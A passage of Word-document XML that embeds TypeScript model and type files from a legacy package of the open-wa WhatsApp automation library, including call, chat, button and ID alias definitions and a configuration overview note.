        <w:t xml:space="preserve">| Exact enum footprint | Intentionally changed | Could be merged/replaced by richer registry.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callback-name definitions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Outputs: canonical exposed callback-name list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Side effects: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 naming drift</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Duplicate/ambiguous callback definitions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bridge and client layers align on callback naming.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Guarantees: callback names remain centrally referenced rather than duplicated ad hoc.</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`CALLBACK_NAME_DEFINED -&gt; BRIDGEABLE_CALLBACK_SURFACE`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packages/legacy-documented/src/api/functions/exposed.enum.pseudo.md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packages/legacy-documented/src/api/functions/exposed.enum.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export enum ExposedFn {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  OnMessage = 'onMessage',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  OnAnyMessage = 'onAnyMessage',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  onAck = 'onAck',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  onParticipantsChanged = 'onParticipantsChanged',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  onStateChanged = 'onStateChanged',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packages/legacy-documented/src/api/functions/exposed.enum.ts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packages/legacy-documented/src/api/model/aliases.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// declare const tag: unique symbol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Brand&lt;K, T&gt; = K &amp; { __brand ?: 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suffix used to identify a non-group chat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ChatServer = 'c.us';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suffix used to identify a group chat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GroupChatServer =  'g.us';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type alias for all available "servers"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WaServers = ChatServer | GroupChatServer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Type alias representing all available country codes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CountryCode = 1 | 7 | 20 | 27 | 30 | 31 | 32 | 33 | 34 | 36 | 39 | 40 | 41 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 81 | 82 | 84 | 86 | 90 | 91 | 92 | 93 | 94 | 95 | 98 | 211 | 212 | 213 | 216 | 218 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 290 | 291 | 297 | 298 | 299 | 350 | 351 | 352 | 353 | 354 | 355 | 356 | 357 | 358 | 359 | 370 | 371 | 372 | 373 | 374 | 375 | 376 | 377 | 378 | 380 | 381 | 382 | 383 | 385 | 386 | 387 | 389 | 420 | 421 | 423 | 500 | 501 | 502 | 503 | 504 | 505 | 506 | 507 | 508 | 509 | 590 | 591 | 592 | 593 | 594 | 595 | 596 | 597 | 598 | 599 | 670 | 672 | 673 | 674 | 675 | 676 | 677 | 678 | 679 | 680 | 681 | 682 | 683 | 685 | 686 | 687 | 688 | 689 | 690 | 691 | 692 | 850 | 852 | 853 | 855 | 856 | 880 | 886 | 960 | 961 | 962 | 963 | 964 | 965 | 966 | 967 | 968 | 970 | 971 | 972 | 973 | 974 | 975 | 976 | 977 | 992 | 993 | 994 | 995 | 996 | 998</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account number. It is made up of a country code and then the local number without the preceeding 0. For example, if a UK (+44) wa account is linked to the number 07123456789 then the account number will be 447123456789.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AccountNumber = `${number}`;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new group or community has the format of a random number followed by `@g.us`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GroupId = `${number}@${GroupChatServer}`;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group chat ends with `@g.us` and usually has two parts, the timestamp of when it was created, and the user id of the number that created the group. For example `[creator number]-[timestamp]@g.us`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`"447123456789-1445627445@g.us"`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GroupChatId = `${AccountNumber}-${number}@${GroupChatServer}` | GroupId;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contact id ends with `@c.us` and only contains the number of the contact. For example, if the country code of a contact is `44` and their number is `7123456789` then the contact id would be `447123456789@c.us`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`"447123456789@c.us"`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ContactId = Brand&lt;`${AccountNumber}@${ChatServer}`, "ContactId"&gt;;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chat id ends with `@c.us` or `@g.us` for group chats.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 group chat: `"447123456789-1445627445@g.us"`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * A group chat: `"447123456789@g.us"`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ChatId = ContactId | GroupChatId</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id of a message. The format is `[boolean]_[ChatId]_[random character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`"false_447123456789@c.us_9C4D0965EA5C09D591334AB6BDB07FEB"`</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MessageId = Brand&lt;`${boolean}_${ChatId}_${string}`, "MessageId"&gt;;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This is a generic type alias for the content of a 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`"hello!"`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Content = Brand&lt;string, "Content"&gt;;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NonSerializedId = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  server: WaServers,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  user: AccountNumber,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  _serialized: ContactId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Data URLs, URLs prefixed with the data: scheme, allow content creators to embed small files inline in documents. They were formerly known as "data URIs" until that name was retired by the WHATWG.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Data URLs are composed of four parts: a prefix (data:), a MIME type indicating the type of data, an optional base64 token if non-textual, and the data itself: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`"data:[&lt;mediatype&gt;][;base64],&lt;data&gt;"`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Learn more here: https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/Data_URIs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DataURL = Brand&lt;`data:${string};base64,${Base64}`, "DataURL"&gt;;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Base64 is basically a file encoded as a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Base64 is a group of similar binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into a radix-64 representation. The term Base64 originates from a specific MIME content transfer encoding.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Learn more here: https://developer.mozilla.org/en-US/docs/Glossary/Base64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type Base64 = string &amp; { readonly [tag] ?: 'Base64' };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export type Base64 = Brand&lt;string, "Base64"&gt;;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relative or absolute path of a file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Learn more here: https://www.w3schools.com/html/html_filepaths.asp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FilePath = Brand&lt;string, "FilePath"&gt;;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URL of a file used with a GET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GetURL = Brand&lt;string, "GetURL"&gt;;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Some file based actions in open-wa are powerful enough to take a dataurl, url or filepath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AdvancedFile = DataURL | FilePath | GetURL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">--- END FILE: packages/legacy-documented/src/api/model/aliases.ts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packages/legacy-documented/src/api/model/button.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">export interface Button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AdvancedButton {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    id ?: string</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url ?: string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    number ?: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Row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rowId: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Section {</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rows: Row[]</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LocationButtonBody {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    lat:number,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    lng:number,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    caption:string</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packages/legacy-documented/src/api/model/button.ts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packages/legacy-documented/src/api/model/call.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ContactId } from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CallState {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  INCOMING_RING= "INCOMING_RING",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  OUTGOING_RING= "OUTGOING_RING",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  OUTGOING_CALLING= "OUTGOING_CALLING",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  CONNECTING= "CONNECTING",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  CONNECTION_LOST= "CONNECTION_LOST",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ACTIVE= "ACTIVE",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  HANDLED_REMOTELY= "HANDLED_REMOTELY",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ENDED= "ENDED",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  REJECTED= "REJECTED",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  REMOTE_CALL_IN_PROGRESS= "REMOTE_CALL_IN_PROGRESS",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  FAILED= "FAILED",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  NOT_ANSWERED= "NOT_ANSWERED"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Call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account calling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peerJid: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epoch timestamp of the call. You will have to multiply this by 1000 to get the actual epoch timestamp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offerTime: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call is a video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isVideo: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call is a group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isGroup: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    canHandleLocally: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direction of the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outgoing: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    webClientShouldHandle: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other participants on a group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participants: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State of the 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CallState</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  } </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">--- END FILE: packages/legacy-documented/src/api/model/call.ts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packages/legacy-documented/src/api/model/chat.ts ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ContactId, GroupChatId } from './aliases';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { Contact } from './contact';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import { GroupMetadata } from './group-metadata';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BaseChat {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  archive: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  changeNumberNewJid: any;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  changeNumberOldJid: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related to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contact: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Group metadata for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groupMetadata: GroupMetadata;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chat is a group chat is restricted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isAnnounceGrpRestrict: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title of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formattedTitle?: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your host account is able to send messages to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canSend?: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the chat is a group chat and the group is restricted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isReadOnly: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  kind: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labels attached to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last message received in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lastReceivedKey: any;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  modifyTag: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messages in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expiration timestamp of the chat mute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muteExpiration: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name of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the chat is marked as spam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notSpam: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Messages that are pending to be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pendingMsgs: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the chat is pinned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presence state of the chat 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presence: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last interaction in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undread messages in this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unreadCount: number;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ack?: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 This is unreliable. Use the method [`isChatOnline`](https://open-wa.github.io/wa-automate-nodejs/classes/client.html#ischatonline)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isOnline?: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 This is unreliable. Use the method [`getLastSeen`](https://open-wa.github.io/wa-automate-nodejs/classes/client.html#getlastseen)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lastSeen?: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URL of the chat picture if available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pic?:string;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SingleChat extends BaseChat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the chat is a group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isGroup: false;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GroupChat extends BaseChat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the chat is a group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isGroup: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the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groupType: 'DEFAULT' | 'COMMUNITY' | 'LINKED_ANNOUNCEMENT_GROUP' | 'LINKED_GENERAL_GROUP' | 'LINKED_SUBGROUP'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Chat =  SingleChat | GroupChat;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LiveLocationChangedEvent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lat: number,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  lng: number,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  speed: number,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  lastUpdated: number,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  accuracy: number,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  degrees: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that was sent when the liveLocation session was started.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msgId?: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ChatState represents the state you'd normally see represented under the chat name in the app.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ChatState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`recording audio...`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RECORDING,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`online`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PAUSED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Chat types</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ChatTypes {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  SOLO = 'solo',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  GROUP = 'group',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  UNKNOWN =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Valid durations for muting a chat using [[muteChat]]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ChatMuteDuration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Mutes chat for 8 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EIGHT_HOURS = 'EIGHT_HOURS',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Mutes chat for 1 week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ONE_WEEK = 'ONE_WEEK',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Mutes chat forever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FOREVER = 'FOREVER'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GroupChatCreationParticipantAddResponse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resultant status code for adding the participant.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200 if the participant was added successfully during the creation of the group.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403 if the participant does not allow their account to be added to group chats. If you receive a 403, you will also get an `invite_code` and `invite_code_exp`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code: 200 | 400 |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participant is not allowed to be added to group chats due to their privacy settings, you will receive an `invite_code` which you can send to them via a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invite_code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expiry ts of the invite_code. It is a number wrapped in a string, in order to get the proper time you can use this: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new Date(Number(invite_code_exp)*1000)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invite_code_exp ?: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GroupChatCreationResponse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resultant status code of the group chat creation.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200 if the group was created successfully.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400 if the initial participant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status: 200 | 400,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group chat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gid: GroupChatId;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initial requested participants and their corresponding add responses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participants: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      ContactId ?: GroupChatCreationParticipantAddResponse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Ephemeral duration can be 1 day, 7 days or 90 days. The default is 1 day.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EphemeralDuration = 86400 | 604800 | 7776000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">--- END FILE: packages/legacy-documented/src/api/model/chat.ts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packages/legacy-documented/src/api/model/config.pseudo.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># api/model/config.ts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`packages/legacy/src/api/model/config.ts`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the legacy configuration contract. It is large, so this note focuses on the parts that shape launcher behavior and migration assumptions.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`ConfigObject` and related enums/types used by `create()`, CLI setup, browser launch, media processing, logging, and integrations.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Key structural sections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`config.ts:9-124` — enums and supporting types for QR output, cloud providers, directory strategies, notification language, error policy, QR quality, and license types.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- `config.ts:127-212` — structural interfaces for persisted session data, devtools, event payloads, webhooks, and proxy credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- `config.ts:213+` — `ConfigObject`, the central legacy config surface consumed by `initializer.ts`, `browser.ts`, `Client.ts`, CLI, and middleware.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Bootstrap-relevant responsibilities inside ConfigObject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 restoration (`sessionData`, `sessionDataPath`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- auth mode (`linkCode`, historical QR/session knobs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
